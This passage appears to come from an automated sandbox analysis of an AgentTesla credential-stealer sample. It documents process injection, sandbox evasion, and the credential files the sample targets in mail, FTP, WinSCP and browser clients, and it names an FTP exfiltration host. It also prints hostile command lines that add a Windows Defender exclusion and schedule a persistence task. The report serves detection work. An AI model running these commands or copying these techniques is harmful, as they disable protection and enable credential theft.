                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6284Thread sleep time: -10145709240540247s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5828Thread sleep time: -15679732462653109s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5784Thread sleep count: 1344 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5784Thread sleep count: 8509 > 30
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\PO02673492.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5894
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2374
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 1344
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 8509
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\PO02673492.exeThread delayed: delay time: 34820
                      Source: C:\Users\user\Desktop\PO02673492.exeThread delayed: delay time: 65000
                      Source: C:\Users\user\Desktop\PO02673492.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                      Source: PO02673492.exe, 00000000.00000002.675946924.0000000003720000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                      Source: PO02673492.exe, 00000000.00000002.675946924.0000000003720000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: PO02673492.exe, 00000000.00000002.675946924.0000000003720000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: MSBuild.exe, 00000008.00000002.926184784.0000000005EA0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllowerManagementCapabilities
                      Source: PO02673492.exe, 00000000.00000002.675946924.0000000003720000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_01100A70 KiUserExceptionDispatcher,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,
                      Source: C:\Users\user\Desktop\PO02673492.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Writes to foreign memory regionsShow sources
                      Source: C:\Users\user\Desktop\PO02673492.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                      Source: C:\Users\user\Desktop\PO02673492.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
                      Source: C:\Users\user\Desktop\PO02673492.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 438000
                      Source: C:\Users\user\Desktop\PO02673492.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43A000
                      Source: C:\Users\user\Desktop\PO02673492.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BDE008
                      Allocates memory in foreign processesShow sources
                      Source: C:\Users\user\Desktop\PO02673492.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\PO02673492.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                      Adds a directory exclusion to Windows DefenderShow sources
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NzjFNaJxjqA.exe
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NzjFNaJxjqA.exe
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NzjFNaJxjqA.exe
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NzjFNaJxjqA" /XML "C:\Users\user\AppData\Local\Temp\tmp1C7.tmp
                      Source: C:\Users\user\Desktop\PO02673492.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Source: MSBuild.exe, 00000008.00000002.924580267.0000000001680000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: MSBuild.exe, 00000008.00000002.924580267.0000000001680000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: MSBuild.exe, 00000008.00000002.924580267.0000000001680000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: MSBuild.exe, 00000008.00000002.924580267.0000000001680000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\PO02673492.exeQueries volume information: C:\Users\user\Desktop\PO02673492.exe VolumeInformation
                      Source: C:\Users\user\Desktop\PO02673492.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\PO02673492.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\PO02673492.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\PO02673492.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0.2.PO02673492.exe.472d180.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO02673492.exe.47633a0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO02673492.exe.47633a0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO02673492.exe.472d180.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000000.672189969.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.672673681.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.923580235.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.673240968.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.673779627.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.676785013.00000000046D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.925075813.0000000002F81000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PO02673492.exe PID: 6900, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6292, type: MEMORYSTR
                      Tries to steal Mail credentials (via file / registry access)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: Yara matchFile source: 00000008.00000002.925075813.0000000002F81000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6292, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0.2.PO02673492.exe.472d180.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO02673492.exe.47633a0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO02673492.exe.47633a0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.PO02673492.exe.472d180.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000000.672189969.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.672673681.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.923580235.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.673240968.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000000.673779627.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.676785013.00000000046D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.925075813.0000000002F81000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PO02673492.exe PID: 6900, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6292, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Scheduled Task/Job1Process Injection312Disable or Modify Tools11OS Credential Dumping2File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Alternative Protocol1Encrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsCommand and Scripting Interpreter2Boot or Logon Initialization ScriptsScheduled Task/Job1Deobfuscate/Decode Files or Information1Input Capture11System Information Discovery114Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsScheduled Task/Job1Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Credentials in Registry1Query Registry1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing3NTDSSecurity Software Discovery311Distributed Component Object ModelInput Capture11Scheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading11LSA SecretsProcess Discovery2SSHClipboard Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion131Cached Domain CredentialsVirtualization/Sandbox Evasion131VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection312DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 532662 Sample: PO02673492.exe Startdate: 02/12/2021 Architecture: WINDOWS Score: 100 31 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->31 33 Found malware configuration 2->33 35 Multi AV Scanner detection for dropped file 2->35 37 8 other signatures 2->37 7 PO02673492.exe 7 2->7         started        process3 file4 23 C:\Users\user\AppData\...23zjFNaJxjqA.exe, PE32 7->23 dropped 25 C:\Users\user\AppData\Local\Temp\tmp1C7.tmp, XML 7->25 dropped 27 C:\Users\user\AppData\...\PO02673492.exe.log, ASCII 7->27 dropped 39 Uses schtasks.exe or at.exe to add and modify task schedules 7->39 41 Writes to foreign memory regions 7->41 43 Allocates memory in foreign processes 7->43 45 2 other signatures 7->45 11 MSBuild.exe 15 6 7->11         started        15 powershell.exe 25 7->15         started        17 schtasks.exe 1 7->17         started        signatures5 process6 dnsIp7 29 ftp.pfsbankgroup.com 37.0.9.166, 21, 35382, 35415 WKD-ASIE Netherlands 11->29 47 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->47 49 Queries 